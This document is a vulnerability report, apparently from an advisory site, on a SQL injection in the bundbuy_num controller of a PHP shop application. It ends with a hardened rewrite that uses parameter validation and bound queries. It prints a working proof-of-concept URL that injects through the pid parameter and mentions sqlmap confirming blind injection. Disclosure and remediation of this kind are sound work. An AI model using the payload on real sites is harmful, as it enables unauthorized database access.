### Summary: Unfiltered parameter leads to SQL injection

### Details:

The problem is in /protected/controllers/simple.php:

```
// Bundled-product quantity
public function bundbuy_num(){
    $id = Filter::int(Req::args('id'));
    $num = Filter::int(Req::args('num'));
    if($num<=0)$num = 1;
    $product_id = Req::args('pid'); // the pid parameter is assigned to $product_id without any filtering
    $product_ids = preg_replace('/-/i', ',', $product_id); // every "-" in $product_id is replaced with "," and the result stored in $product_ids
    $model = new Model("bundling");
    $bund = $model->where("id=$id")->find();
    if($bund){ // for this branch to run, a bundle with this $id must exist
        $goods_id = $bund['goods_id'];
        $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id")->group("go.id")->findAll(); // $product_ids is concatenated straight into the query
        $products = $this->packBundbuyProducts($products);
    }
    $weight = 0;
    $max_num = $num;
    foreach ($products as $prod) {
        $weight += $prod['weight'];
        if($max_num>$prod['store_nums'])$max_num = $prod['store_nums'];
    }
    $num = $max_num;
    $amount = sprintf("%01.2f",$bund['price'] * $num);
    $product[$product_id] = array('id'=>$product_ids,'goods_id'=>'','name'=>'','img'=>'','num'=>$num,'store_nums'=>$num,'price'=>$bund['price'],'spec'=>array(),'amount'=>$amount,'sell_total'=>$amount,'weight'=>$weight,'point'=>'',"prom_goods"=>array(),"sell_price"=>$bund['price'],"real_price"=>$bund['price']);
    echo JSON::encode($product);
}
```

### Proof of vulnerability:

http://localhost/index.php?con=simple&act=bundbuy_num&id=1&num=1&pid=1,2,3,4) and 1=1 %23

![QQ截图20140824203047.png](https://images.seebug.org/upload/201408/24203220d1aa5f4dc5d378d809e733993e175480.png)

![QQ截图20140824203116.png](https://images.seebug.org/upload/201408/24203227fa34c9542343c7e7a7ec587dd055a992.png)

Running sqlmap against it confirms pid as the injectable parameter, and it is also a time-based blind injection.

![QQ截图20140824204828.png](https://images.seebug.org/upload/201408/242049398fbd563514627c20483226c62bf4737f.png)
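A hardened form of the same lookup, written here as an added example (not code from the project): pid is validated as a dash-separated list of positive integers before any SQL is built, and the IN clause is made of bound placeholders instead of request text. `$pdo`, `parseProductIds` and `findBundleProducts` are assumed names that stand in for the framework's Req/Model helpers.

```php
<?php
// Hardened pid handling for bundbuy_num(): added example, not the project's code.
// Assumes a PDO connection $pdo; the framework's Req/Model helpers are replaced
// by plain PHP so the example runs stand-alone.

/**
 * Parse a "1-2-3" style pid value into a list of positive integers.
 * Returns null if any segment is not a plain unsigned integer, so input like
 * the report's "1,2,3,4) and 1=1 #" is rejected before any SQL is built.
 */
function parseProductIds(string $pid, int $maxIds = 50): ?array
{
    $ids = [];
    foreach (explode('-', $pid) as $part) {
        // ctype_digit accepts only [0-9]+: no sign, space, comma or comment chars
        if ($part === '' || !ctype_digit($part) || (int) $part < 1) {
            return null;
        }
        $ids[] = (int) $part;
    }
    if (count($ids) === 0 || count($ids) > $maxIds) {
        return null;
    }
    return array_values(array_unique($ids));
}

/**
 * Same lookup the controller performs, but the IN list is made of
 * placeholders and each id is bound as an integer, never interpolated.
 */
function findBundleProducts(PDO $pdo, array $ids): array
{
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = 'SELECT go.*, pr.id AS product_id FROM goods AS go '
         . 'LEFT JOIN products AS pr ON pr.goods_id = go.id '
         . "WHERE pr.id IN ($placeholders) GROUP BY go.id";
    $stmt = $pdo->prepare($sql);
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Controller-side use: reject the request instead of passing bad input on.
$ids = parseProductIds((string) ($_GET['pid'] ?? ''));
if ($ids === null) {
    http_response_code(400);
    exit('invalid pid');
}
$products = findBundleProducts($pdo, $ids);
```

With this shape, `id` should be bound the same way rather than interpolated via `where("id=$id")`, even though Filter::int already narrows it.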